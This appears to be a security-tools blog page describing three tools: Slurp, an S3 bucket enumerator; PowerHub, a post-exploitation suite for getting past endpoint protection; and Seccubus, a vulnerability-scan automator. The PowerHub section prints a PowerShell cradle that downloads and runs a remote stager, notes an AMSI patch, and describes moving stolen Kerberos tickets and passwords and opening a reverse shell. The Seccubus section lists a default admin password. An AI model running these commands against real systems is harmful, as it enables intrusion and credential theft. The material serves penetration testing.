Slurp- Blackbox/Whitebox S3 Bucket Enumerator

To Evaluate the security of S3 buckets

Overview

• Credit to all the vendor packages to develop Slurp possible.
• Slurp is for pen-testers and security professionals to perform audits of s3 buckets.

Features

• Scan via domain(s); you can target a single domain or a list of domains
• Scan via keyword(s); you can target a single keyword or a list of keywords
• Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
• Colorized output for visual grep
• Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
• Punycode support for internationalized domains
• Strong copyleft license (GPLv3)

Modes

There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.

Blackbox (external)

In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.

Domain


Keywords

Whitebox (internal)

In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.

Your credentials should be in ~/.aws/credentials.

Internal

Usage

• slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
• slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
• slurp internal performs an internal scan using the AWS API.

Installation

This project uses vgo; you can clone and go build or download from Releases section.

Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.

Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.

Download Slurp

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection

PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.

During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json

Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub

Seccubus- Easy Automated Vulnerability Scanning, Reporting And Analysis

Seccubus automates regular vulnerability scans with various tools and aids security people in the fast analysis of its output, both on the first scan and on repeated scans.

Seccubus runs vulnerability scans at regular intervals and compares the findings of the last scan with the findings of the previous scan. The delta of this scan is presented in a web GUI where findings can be easily marked as either real findings or non-issues.

On repeated scan delta reporting ensures that findings only need to be judged when they first appear in the scan results or when their output changes.

Seccubus 2.x is the only actively developed and maintained branch and all support for Seccubus V1 has officially been dropped.

Seccubus V2 works with the following scanners:

• Nessus
• OpenVAS
• Skipfish
• Medusa (local and remote)
• Nikto (local and remote)
• NMap (local and remote)
• OWASP-ZAP (local and remote)
• SSLyze
• Medusa
• Qualys SSL labs
• testssl.sh (local and remote)

Docker

Available images.

         Image name                                   Purpose                         

• seccubus                     Run a full Seccubus stack in a single container
• seccubus-front            Serving just the front end HTML, javascript and css
• seccubus-web             Serving front and code and API simultaniously
• seccubus-api               Serving just the API.
• seccubus-perl              Running command line scripts, e.g. to scan
• seccubus-cron             Running cron deamon to execute scans

Information about the docker containers is here

Default password, changing it.

After installation the default username and password for seccubus is:

admin / GiveMeVulns!

It is highly recommended you change this after installation.

/bin/seccubus_passwd -u admin

Download Seccubus